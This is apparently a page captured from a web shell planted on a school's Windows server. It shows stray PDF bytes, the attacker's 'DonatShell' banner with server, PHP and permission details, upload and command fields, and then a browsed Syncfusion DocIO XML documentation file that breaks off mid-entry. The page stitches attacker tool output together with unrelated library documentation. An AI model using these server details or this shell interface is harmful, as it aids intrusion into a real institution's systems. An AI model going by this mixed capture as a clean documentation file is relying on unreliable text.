%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files (x86)/Kowit/SchoolManage/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Program Files (x86)/Kowit/SchoolManage//Syncfusion.DocIO.Base.xml
<?xml version="1.0"?>
<doc>
    <assembly>
        <name>Syncfusion.DocIO.Base</name>
    </assembly>
    <members>
        <member name="T:Syncfusion.CompoundFile.DocIO.CloneUtils">
            <exclude/>
             <summary>
             Contains utility methods for object cloning.
             </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneIntArray(System.Int32[])">
            <summary>
            Clones int array.
            </summary>
            <param name="array">Array to clone</param>
            <returns>Returns cloned array.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneUshortArray(System.UInt16[])">
            <summary>
            Clones ushort array.
            </summary>
            <param name="array">Array to clone.</param>
            <returns>Returns cloned array.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneStringArray(System.String[])">
            <summary>
            Clones string array.
            </summary>
            <param name="array">Array to clone.</param>
            <returns>Returns cloned array.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneArray(System.Object[])">
            <summary>
            Clones object array.
            </summary>
            <param name="array">Array to clone.</param>
            <returns>Returns cloned array.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneCloneable(System.ICloneable)">
            <summary>
            Clones object that implements ICloneable interface.
            </summary>
            <param name="toClone">Object to clone.</param>
            <returns>A clone of the object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneByteArray(System.Byte[])">
            <summary>
            Clones byte array.
            </summary>
            <param name="arr">Array to clone.</param>
            <returns>Return cloned array.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneHash``2(System.Collections.Generic.Dictionary{``0,``1})">
            <summary>
            Clone Dictionary.
            </summary>
            <param name="hash">Dictionary to clone</param>
            <returns>Returns a copy of the Dictionary.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneHash(System.Collections.Generic.Dictionary{System.Int32,System.Int32})">
            <summary>
            Clone Dictionary.
            </summary>
            <param name="hash">Dictionary to clone</param>
            <returns>Returns a copy of the Dictionary.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CloneUtils.CloneStream(System.IO.Stream)">
            <summary>
            Creates copy of the stream.
            </summary>
            <param name="stream">Stream to copy.</param>
            <returns>Created stream.</returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl">
            <summary>
            Summary description for DocumentPropertyImpl.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.IDocProperty">
            <summary>
            Represents single document property.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.IsBuiltIn">
            <summary>
            Indicates whether property is built-in. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.PropertyId">
            <summary>
            Returns property id for built-in properties. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.Name">
            <summary>
            Returns property name. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.Value">
            <summary>
            Gets / sets property value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.Boolean">
            <summary>
            Gets / sets boolean value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.Integer">
            <summary>
            Gets / sets integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.Int32">
            <summary>
            Gets / sets 4-bytes signed integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.Double">
            <summary>
            Gets / sets double value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.Text">
            <summary>
            Gets / sets string value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.DateTime">
            <summary>
            Gets / sets DateTime value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.TimeSpan">
            <summary>
            Gets / sets TimeSpan value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.LinkSource">
            <summary>
            Returns or sets the source of a linked custom document property. Read/write String.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.IDocProperty.LinkToContent">
            <summary>
            True if the value of the custom document property is linked to the content
            of the container document. False if the value is static. Read/write Boolean.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.DEF_START_ID2">
            <summary>
            Start index for Id2 PropVariant property.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.DEF_FILE_TIME_START_YEAR">
            <summary>
            Start year for FILETIME structure.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.m_propertyId">
            <summary>
            Property id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.m_strName">
            <summary>
            Property name.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.m_value">
            <summary>
            Property value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.m_type">
            <summary>
            Property type.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.m_strLinkSource">
            <summary>
            The source of a linked custom document property. Read/write String.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.m_bLinkToContent">
            <summary>
            True if the value of the custom document property is linked to the content
            of the container document. False if the value is static. Read/write Boolean.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.#ctor(System.String,System.Object)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="strName">Property name.</param>
            <param name="value">Property value.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.#ctor(Syncfusion.CompoundFile.DocIO.BuiltInProperty,System.Object)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="propertyId">Property id.</param>
            <param name="value">Property value.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.#ctor(Syncfusion.CompoundFile.DocIO.Net.IPropertyData,System.Boolean)">
            <summary>
            Initializes new instance of the document property.
            </summary>
            <param name="variant">Variant that contains property data.</param>
            <param name="bSummary">
            Indicates whether property is from document summary or not (only for
            built-int properties).</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.DetectStringType(System.String)">
            <summary>
            Detects type of the string.
            </summary>
            <param name="value">String value to check.</param>
            <returns>Detected string type.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.FillPropVariant(Syncfusion.CompoundFile.DocIO.Net.IPropertyData,System.Int32)">
            <summary>
            Copies document property data into PropVariant.
            </summary>
            <param name="variant">Destination object.</param>
            <param name="iPropertyId">PropertyId for custom properties.</param>
            <returns>True if was able to fill variant; false otherwise.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.CorrectIndex(Syncfusion.CompoundFile.DocIO.BuiltInProperty,System.Boolean@)">
            <summary>
            Converts propertyId into correct index.
            </summary>
            <param name="propertyId">PropertyId to convert.</param>
            <param name="bSummary">[out] Indicates whether this is document summary property of simply document property.</param>
            <returns>Correct property index.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.DetectPropertyType">
            <summary>
            Tries to detect and set property type.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.SetLinkSource(Syncfusion.CompoundFile.DocIO.Net.IPropertyData)">
            <summary>
            Sets value of LinkSource property.
            </summary>
            <param name="variant">Variant that contains value to set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Write(Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage,Syncfusion.CompoundFile.DocIO.Native.PropVariant,System.Int32)">
            <summary>
            Saves property into IPropertyStorage.
            </summary>
            <param name="storProp">Storage to save into.</param>
            <param name="variant">Property variant used as buffer.</param>
            <param name="iPropertyId">Property id for custom properties.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Clone">
            <summary>
            Creates a new object that is a copy of the current instance.
            </summary>
            <returns>A new object that is a copy of this instance.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.CloneValue">
            <summary>
            Creates copy of the internal value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.IsBuiltIn">
            <summary>
            Indicates whether property is built-in. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.PropertyId">
            <summary>
            Returns / sets property id for built-in properties.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Name">
            <summary>
            Returns property name. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Value">
            <summary>
            Gets / sets property value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Boolean">
            <summary>
            Gets / sets boolean value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Integer">
            <summary>
            Gets / sets integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Int32">
            <summary>
            Gets / sets 4-bytes signed integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Double">
            <summary>
            Gets / sets double value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Text">
            <summary>
            Gets / sets string value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.DateTime">
            <summary>
            Gets / sets DateTime value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.TimeSpan">
            <summary>
            Gets / sets TimeSpan value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.Blob">
            <summary>
            Gets / sets Blob value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.ClipboardData">
            <summary>
            Gets or sets clipboard data value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.StringArray">
            <summary>
            Gets / sets array of strings.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.ObjectArray">
            <summary>
            Gets / sets array of objects. Supported object types are string and Int32.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.PropertyType">
            <summary>
            Gets / sets document property type.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.LinkSource">
            <summary>
            Returns or sets the source of a linked custom document property. Read/write String.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.LinkToContent">
            <summary>
            True if the value of the custom document property is linked to the content of the container document. False if the value is static. Read/write Boolean.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.DocumentPropertyImpl.InternalName">
            <summary>
            Internal name of the document property.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.BuiltInProperty">
            <summary>
            Property IDs for the SummaryInformation Property Set.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Title">
            <summary>
            Title document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Subject">
            <summary>
            Subject document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Author">
            <summary>
            Author document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Keywords">
            <summary>
            Keywords document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Comments">
            <summary>
            Comments document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Template">
            <summary>
            Template document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.LastAuthor">
            <summary>
            LastAuthor document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.RevisionNumber">
            <summary>
            Revnumber document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.EditTime">
            <summary>
            EditTime document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.LastPrinted">
            <summary>
            LastPrinted document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.CreationDate">
            <summary>
            CreationDate document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.LastSaveDate">
            <summary>
            LastSaveDate document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.PageCount">
            <summary>
            PageCount document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.WordCount">
            <summary>
            WordCount document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.CharCount">
            <summary>
            CharCount document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Thumbnail">
            <summary>
            Thumbnail document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.ApplicationName">
            <summary>
            ApplicationName document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Security">
            <summary>
            Ssecurity document property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Category">
            <summary>
            Category Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.PresentationTarget">
            <summary>
            Target format for presentation (35mm, printer, video, and so on) id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.ByteCount">
            <summary>
            ByteCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.LineCount">
            <summary>
            LineCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.ParagraphCount">
            <summary>
            ParCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.SlideCount">
            <summary>
            SlideCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.NoteCount">
            <summary>
            NoteCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.HiddenCount">
            <summary>
            HiddenCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.MultimediaClipCount">
            <summary>
            MmclipCount Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.ScaleCrop">
            <summary>
            ScaleCrop property Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.HeadingPair">
            <summary>
            HeadingPair Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.DocParts">
            <summary>
            DocParts Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Manager">
            <summary>
            Manager Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.Company">
            <summary>
            Company Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.LinksDirty">
            <summary>
            LinksDirty Id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.BuiltInProperty.CharactersWithSpaces">
            <summary>
            The character count with space
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.PropertyType">
            <summary>
            Enumeration with all supported property types.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Bool">
            <summary>
            Indicates a Boolean value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Int">
            <summary>
            Indicates an integer value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Int32">
            <summary>
            Indicates a 4-bytes signed integer value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Int16">
            <summary>
            Indicates a 2-bytes signed interger value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.UInt32">
            <summary>
            Indicates a 4-bytes unsigned interger value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.String">
            <summary>
            Indicates a wide string terminated by a null.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.AsciiString">
            <summary>
            Indicates a string terminated by a null.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.DateTime">
            <summary>
            Indicates a FILETIME value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Blob">
            <summary>
            Indicates length prefixed bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Vector">
            <summary>
            Indicates a simple, counted array.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Object">
            <summary>
            Indicates an object.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Double">
            <summary>
            Indicates a double value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Empty">
            <summary>
            Indicates an empty value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.Null">
            <summary>
            Indicates null value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.ClipboardData">
            <summary>
            Indicates clipboard data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.AsciiStringArray">
            <summary>
            Indicates an array of strings.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.StringArray">
            <summary>
            Indicates an array of strings.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.PropertyType.ObjectArray">
            <summary>
            Indicates an array of objects. Supported types are string and integer values.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.CompoundStream">
            <summary>
            This interface represents stream in the compound file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.CompoundStream.m_strStreamName">
            <summary>
            Name of the stream.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CompoundStream.#ctor(System.String)">
            <summary>
            Initializes new instance of the compound stream object.
            </summary>
            <param name="streamName">Name of the stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.CompoundStream.CopyTo(Syncfusion.CompoundFile.DocIO.CompoundStream)">
            <summary>
            Copies stream content into another stream object.
            </summary>
            <param name="stream">Stream to copy data into.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.CompoundStream.Name">
            <summary>
            Returns name of the stream.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.ICompoundFile">
            <summary>
            This interface gives access to compound file functionality.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundFile.Flush">
            <summary>
            Flushes content into internal buffer.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundFile.Save(System.IO.Stream)">
            <summary>
            Saves compound file into stream
            </summary>
            <param name="stream">Stream to save data into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundFile.Save(System.String)">
            <summary>
            Saves compound file into file.
            </summary>
            <param name="fileName">Name of the file to save into.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.ICompoundFile.RootStorage">
            <summary>
            Returns root storage object for this file.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.ICompoundStorage">
            <summary>
            This interface represents storage object in the compound file.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.CreateStream(System.String)">
            <summary>
            Creates new stream inside this storage.
            </summary>
            <param name="streamName">Name of the stream to create.</param>
            <returns>Created stream object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.OpenStream(System.String)">
            <summary>
            Opens existing stream inside this storage.
            </summary>
            <param name="streamName">Name of the stream to open.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.DeleteStream(System.String)">
            <summary>
            Removes existing stream from this storage.
            </summary>
            <param name="streamName">Name of the stream to remove.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.ContainsStream(System.String)">
            <summary>
            Determines whether storage contains specified stream.
            </summary>
            <param name="streamName">Name of the stream to check.</param>
            <returns>true if storage contains specified stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.CreateStorage(System.String)">
            <summary>
            Creates new substorage inside this one.
            </summary>
            <param name="storageName">Name of the storage to create.</param>
            <returns>Created storage object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.OpenStorage(System.String)">
            <summary>
            Opens existing substorage inside this one.
            </summary>
            <param name="storageName">Name of the storage to open.</param>
            <returns>Created storage object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.DeleteStorage(System.String)">
            <summary>
            Removes exisiting substorage from this one.
            </summary>
            <param name="storageName">Name of the storage to remove.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.ContainsStorage(System.String)">
            <summary>
            Determines whether this storage contains substorage with specified name.
            </summary>
            <param name="storageName">Name of the storage to check.</param>
            <returns>true if storage contains substorage with specified name.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.Flush">
            <summary>
            Commits changes.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.InsertCopy(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Inserts copy of the storage and all subitems inside current storage.
            </summary>
            <param name="storageToCopy">Storage to copy.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ICompoundStorage.InsertCopy(Syncfusion.CompoundFile.DocIO.CompoundStream)">
            <summary>
            Inserts copy of the stream inside current storage.
            </summary>
            <param name="streamToCopy">Stream to copy.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.ICompoundStorage.Streams">
            <summary>
            Returns all stream names that are placed inside this stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.ICompoundStorage.Storages">
            <summary>
            Returns all storage names that are placed inside this stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.ICompoundStorage.Name">
            <summary>
            Returns name of the storage.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.LockShareViolationException">
            <summary>
            This exception should be thrown when lock or share violation has occured.
            Usually this happens when user tries to create storage on file opened by somebody else.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.LockShareViolationException.DEF_MESSAGE">
            <summary>
            Default message.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.LockShareViolationException.DEF_MESSAGE_CODE">
            <summary>
            Message for exception message with record code.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.LockShareViolationException.#ctor">
            <summary>
            Initializes a new instance of the class with default error message.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.LockShareViolationException.#ctor(System.String)">
            <summary>
            Initializes a new instance of the class with a specified error message.
            </summary>
            <param name="message">Error message.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.LockShareViolationException.#ctor(System.String,System.Exception)">
            <summary>
            Initializes a new instance of the Exception class with
            a specified error message and a reference to the inner
            exception that is the cause of this exception.
            </summary>
            <param name="message">
            The error message that explains the reason for the exception.
            </param>
            <param name="innerException">
            The exception that is the cause of the current exception.
            If the innerException parameter is not a NULL reference
            (Nothing in Visual Basic), the current exception is raised
            in a catch block that handles the inner exception.
            </param>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx">
            <summary>
            Special wrapper class that allows users to control access to stream 
            and cache data. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._DefaultBufferSize">
            <summary>
            Default buffer allocation size.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._s">
            <summary>
            Underlying stream. Close sets _s to NULL.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._buffer">
            <summary>
            Shared read / write buffer. Allocated on first use.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._readPos">
            <summary>
            Read pointer within shared buffer.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._readLen">
            <summary>
            Number of bytes read in buffer from _s.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._writePos">
            <summary>
            Write pointer within shared buffer.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._bufferSize">
            <summary>
            Length of internal buffer if it is allocated.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx._streamPos">
            <summary>
            Stream position when the buffer is read.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.#ctor">
            <summary>
            Default constructor. Hidden to class users.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.#ctor(System.IO.Stream)">
            <summary>
            Initialize class by stream and DefaultBufferSize == 4096.
            </summary>
            <param name="stream">Stream which our class must wrap.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Initialize class by instance of stream and user defined cache size.
            </summary>
            <param name="stream">Stream which our class must wrap.</param>
            <param name="bufferSize">User defined cache size.</param>
            <exception cref="T:System.ArgumentException">Stream does not support Read and Write operations.</exception>
            <exception cref="T:System.ArgumentOutOfRangeException">BufferSize is equal or less than zero.</exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.Read(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Reads data from the stream. If data is cached, the class will not call wrapped
            stream and will simply return a copy of cached data.
            </summary>
            <param name="array">Output buffer.</param>
            <param name="offset">Offset in output buffer where data from stream must be placed.</param>
            <param name="count">Count of bytes which class must return.</param>
            <returns>Quantity of read bytes.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.ReadByte">
            <summary>
            Reads a byte from the underlying stream. Returns an int (byte cast to an int)
            or -1 if it is the end of the stream.
            </summary>
            <returns>Read byte.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.Write(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Writes portion of data into a wrapped stream. Data will be cached if it is possible.
            It will then be saved to the wrapped stream on Flush.
            </summary>
            <param name="array">Array containing data.</param>
            <param name="offset">Offset to the beginning of the portion of data.</param>
            <param name="count">Number of bytes in the portion of data.</param>
            <exception cref="T:System.ArgumentNullException">
            If array or stream is NULL.
            </exception>
            <exception cref="T:System.ArgumentOutOfRangeException">
            If offset or count is less than zero.
            </exception>
            <exception cref="T:System.ArgumentException">
            If array does not contain the required element count.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.BufferedStreamEx.WriteByte(System.Byte)">
            <summary>
